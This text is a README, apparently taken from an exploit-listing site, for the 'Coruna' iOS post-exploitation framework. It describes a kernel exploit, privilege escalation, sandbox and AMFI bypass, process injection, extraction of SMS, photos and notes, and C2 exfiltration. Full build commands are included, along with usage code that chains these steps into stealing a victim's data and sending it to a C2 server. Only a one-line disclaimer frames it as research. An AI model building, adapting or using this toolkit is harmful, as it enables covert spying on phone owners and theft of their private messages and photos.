Share
## https://sploitus.com/exploit?id=2A6EA6E0-2991-59C7-9B0B-44BE39982D89
# Coruna Post-Exploitation Framework
## Overview
This is a complete iOS post-exploitation framework, implemented based on Corunaβs exploitation chain and dump.bin kernel exploits. It supports iOS versions 13.0β17.2.1 and works with A11βA17 chips.
## Architecture
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Coruna Post-Exploitation Framework β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β βββββββββββββββ βββββββββββββββ βββββββββββββββ β
β β Kernel Exploitation β β Privilege Escalation β β Sandbox Bypassβ β
β β (CVE-2023-41974) β β Tampering) β β β β
β βββββββββββββββ βββββββββββββββ βββββββββββββββ β
β β β β β
β ββββββββββββββββββββ΄βββββββββββββββββββ β
β β β
β ββββββββββΌβββββββββ β
β β Task For PID β β
β β (Process Injection) β β
β ββββββββββ¬βββββββββ β
β β β
β ββββββββββββββββββββΌβββββββββββββββββββ β
β β β β β
β ββββββββΌβββββββ ββββββββΌβββββββ ββββββββΌβββββββ β
β β SMS Extraction β β Photo Extraction β β Note Extraction β β
β β (Messages) β β (Photos) β β (Notes) β β
β βββββββββββββββ βββββββββββββββ βββββββββββββββ β
β β
β βββββββββββββββββββββββββββββββββββββββββββββββ β
β β C2 Communication β β β
β β (HTTP/HTTPS, Heartbeat, Command Receipt, Data Return) β β
β βββββββββββββββββββββββββββββββββββββββββββββββ β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββ
## Modules
| Module | File | Function |
|-------|------|-------|
| **kernel_exploit** | `src/core/kernel_exploit.c` | IOSurfaceRoot Exploitation |
| **privilege_escalation** | `src/core/privilege_escalation.c` | Privilege Escalation (cs_blob Tampering) |
| **sandbox_bypass** | `src/core/sandbox_bypass.c` | Sandbox/AMFI Bypass |
| **task_injector** | `src/core/task_injector.c` | Process Injection |
| **c2_communication** | `src/core/c2_communication.c` | C2 Communication |
| **data_extractor** | `src/modules/data_extractor.c` | Data Extraction |
## Supported iOS Versions
| iOS Version | Kernel Exploitation | Privilege Escalation | Sandbox Bypass | Status |
|-------------|-------------------|-------------------|-----------------|--------|
| 13.0β14.x | β
| β
| β
| Supported |
| 15.0-16.x | β
| β
| β
| Supported |
| 16.3-17.2.1 | β
| β
| β
| Supported |
## Device Support
| SoC | Chip | Device | Status |
|-----|------|------|------|
| A11 | T8015 | iPhone X | β
|
| A12 | T8020 | iPhone XS/XR | β
|
| A13 | T8030 | iPhone 11 | β
|
| A14 | T8101 | iPhone 12 | β
|
| A15 | T8110 | iPhone 13 | β
|
| A16 | T8120 | iPhone 14 | β
|
| A17 | T8130 | iPhone 15 | β
|
## Compilation
### Local Compilation (Requires Mac + Xcode)
```bash
cd src/core
# Kernel Exploit Module
xcrun -sdk iphoneos clang \
-arch arm64e \
-shared \
-framework Foundation \
-framework IOKit \
-framework CoreFoundation \
-o kernel_exploit.dylib \
kernel_exploit.c \
-miphoneos_version_min=13.0
# Privilege Escalation Module
xcrun -sdk iphoneos clang \
-arch arm64e \
-shared \
-framework Foundation \
-framework IOKit \
-o privilege_escalation.dylib \
privilege_escalation.c \
-miphoneos_version_min=13.0
# Sandbox Bypass Module
xcrun -sdk iphoneos clang \
-arch arm64e \
-shared \
-framework Foundation \
-o sandbox_bypass.dylib \
sandbox_bypass.c \
-miphoneos_version_min=13.0
# Process Injection Module
xcrun -sdk iphoneos clang \
-arch arm64e \
-shared \
-framework Foundation \
-o task_injector.dylib \
task_injector.c \
-miphoneos_version_min=13.0
# C2 Communication Module
xcrun -sdk iphoneos clang \
-arch arm64e \
-shared \
-framework Foundation \
-lcurl \
-o c2_communication.dylib \
c2_communication.c \
-miphoneos_version_min=13.0
```
### Compilation Using GitHub Actions
1. Create a GitHub repository.
2. Upload the code.
3. Push it to the main branch.
4. GitHub Actions will automatically compile the code.
5. Download the compiled dylibs.
## Usage
### 1. Initialize the framework
```c
privilege_context_t ctx = {0};
coruna_init(&ctx);
```
### 2. Execute the kernel exploit
```c
coruna_kernel_exploit(&ctx);
```
### 3. Perform privilege escalation
```c
coruna_privilege_escalation(&ctx);
```
### 4. Bypass the sandbox
```c
coruna_sandbox_bypass(&ctx);
coruna_amfi_bypass(&ctx);
```
### 5. Extract data
```c
void *data = NULL;
uint32_t size = 0;
// Extract SMS
coruna_extract_data(&ctx, "sms", &data, &size);
// Extract photos
coruna_extract_data(&ctx, "photos", &data, &size);
// Extract notes
coruna_extract_data(&ctx, "notes", &data, &size);
```
### 6. C2 communication
```c
// Initialize C2
coruna_c2_init(NULL);
// Send data
coruna_c2_send_data("/data", data, size);
// Send heartbeat
coruna_c2_heartbeat();
```
## References
- [Coruna Exploit Chain Analysis](https://github.com/khanhduytran0/coruna)
- [dump.bin Kernel Exploit Analysis](https://github.com/matteyeux/coruna)
- [Google GTIG Report](https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit)
- [iVerify Analysis](https://iverify.io/blog/coruna-inside-the-nation-state-grade-ios-exploit-kit-we-ve-been-tracking)
## Disclaimer
This project is used solely for authorized security research and vulnerability reproduction. Using this framework to attack othersβ devices without permission is illegal.